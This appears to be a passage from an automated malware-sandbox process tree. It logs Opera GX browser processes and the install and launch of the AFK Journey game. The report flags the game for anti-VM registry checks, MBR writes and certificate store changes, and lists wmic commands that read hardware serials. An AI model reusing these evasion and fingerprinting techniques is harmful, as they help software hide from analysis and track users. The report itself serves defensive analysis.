--with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --field-trial-handle=9992,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:12⤵PID:6828
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --field-trial-handle=9316,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9940 /prefetch:12⤵PID:5852
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9988,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8860 /prefetch:82⤵
- Suspicious use of SetWindowsHookEx
PID:6740
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6388,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7088 /prefetch:82⤵PID:4652
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=3276,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9360 /prefetch:82⤵PID:4224
-
-
C:\Program Files\scoped_dir5888_272394489\afkjourneysetup_f78bf3faedfb1ebbc23cdffa53d171fe.exe"C:\Program Files\scoped_dir5888_272394489\afkjourneysetup_f78bf3faedfb1ebbc23cdffa53d171fe.exe"2⤵
- Drops file in Program Files directory
PID:3284 -
C:\Program Files (x86)\AFK Journey\AFKJourneyLauncher.exe"C:\Program Files (x86)\AFK Journey\AFKJourneyLauncher.exe"3⤵
- Drops file in Program Files directory
PID:5720 -
C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey.exe"C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey.exe" --env_id=prod8bef2ba4a37b2d80540cd3f97000 --version=1.1.142.1438 --env=prod --gid=f78bf3faedfb1ebbc23cdffa53d171fe4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Checks system information in the registry
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:6340 -
C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\UnityCrashHandler64.exe"C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\UnityCrashHandler64.exe" --attach 6340 22530514657285⤵PID:2040
-
C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\UnityCrashHandler64.exe"C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\UnityCrashHandler64.exe" "6340" "2253051465728"6⤵PID:6516
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get processorid5⤵PID:7956
-
-
C:\Windows\SYSTEM32\nslookup.exenslookup ir-sdk.guardease.com5⤵PID:5420
-
-
C:\Windows\System32\Wbem\wmic.exewmic bios get serialnumber5⤵PID:8000
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID5⤵PID:5204
-
-
C:\Windows\System32\Wbem\wmic.exewmic nicconfig where (IPEnabled=TRUE) get DefaultIPGateway5⤵PID:6440
-
-
C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe"C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe" --start-from-parkapp=0.1.6.1 --pk-env-id=prod8bef2ba4a37b2d80540cd3f97000 --pk-host-port=8888 --trumpet-name= --lang=en --off-screen-rendering-enabled --transparent-painting-enabled --flags=0 --ppid=63405⤵
- Checks computer location settings
PID:5416 -
C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe"C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe" --type=gpu-process --no-sandbox --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 parksdk/0.1.6.1 browser/0.1.6.1" --lang=en --user-data-dir="C:\Users\Admin\.limpc\prod8bef2ba4a37b2d80540cd3f97000\cache" --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Users\Admin\.limpc\prod8bef2ba4a37b2d80540cd3f97000\cache\console.log" --mojo-platform-channel-handle=1464 --field-trial-handle=1520,i,13605718437914010020,7330874650916810579,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:26⤵PID:368
-
-
C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe"C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --ignore-certificate-errors=1 --ignore-certificate-errors=1 --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 parksdk/0.1.6.1 browser/0.1.6.1" --lang=en --user-data-dir="C:\Users\Admin\.limpc\prod8bef2ba4a37b2d80540cd3f97000\cache" --log-file="C:\Users\Admin\.limpc\prod8bef2ba4a37b2d80540cd3f97000\cache\console.log" --mojo-platform-channel-handle=1928 --field-trial-handle=1520,i,13605718437914010020,7330874650916810579,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:86⤵PID:3852
-
-
C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe"C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --no-sandbox --ignore-certificate-errors=1 --ignore-certificate-errors=1 --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 parksdk/0.1.6.1 browser/0.1.6.1" --lang=en --user-data-dir="C:\Users\Admin\.limpc\prod8bef2ba4a37b2d80540cd3f97000\cache" --log-file="C:\Users\Admin\.limpc\prod8bef2ba4a37b2d80540cd3f97000\cache\console.log" --mojo-platform-channel-handle=2532 --field-trial-handle=1520,i,13605718437914010020,7330874650916810579,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:86⤵PID:824
-
-
C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe"C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\limpcbrowserex.exe" --type=renderer --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 parksdk/0.1.6.1 browser/0.1.6.1" --user-data-dir="C:\Users\Admin\.limpc\prod8bef2ba4a37b2d80540cd3f97000\cache" --no-sandbox --force-device-scale-factor=1 --log-file="C:\Users\Admin\.limpc\prod8bef2ba4a37b2d80540cd3f97000\cache\console.log" --js-flags=--expose-wasm --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2636 --field-trial-handle=1520,i,13605718437914010020,7330874650916810579,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:16⤵PID:6624
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=140 --field-trial-handle=8672,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8720 /prefetch:12⤵PID:7524
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --field-trial-handle=7920,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9204 /prefetch:12⤵PID:6340
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --field-trial-handle=6424,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8696 /prefetch:12⤵PID:6104
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --field-trial-handle=6412,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5532 /prefetch:12⤵PID:2932
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=144 --field-trial-handle=3704,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9920 /prefetch:12⤵PID:4084
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=145 --field-trial-handle=9900,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3248 /prefetch:12⤵PID:4492
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=146 --field-trial-handle=8772,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9956 /prefetch:12⤵PID:5384
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=147 --field-trial-handle=10396,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6376 /prefetch:12⤵PID:7940
-
-
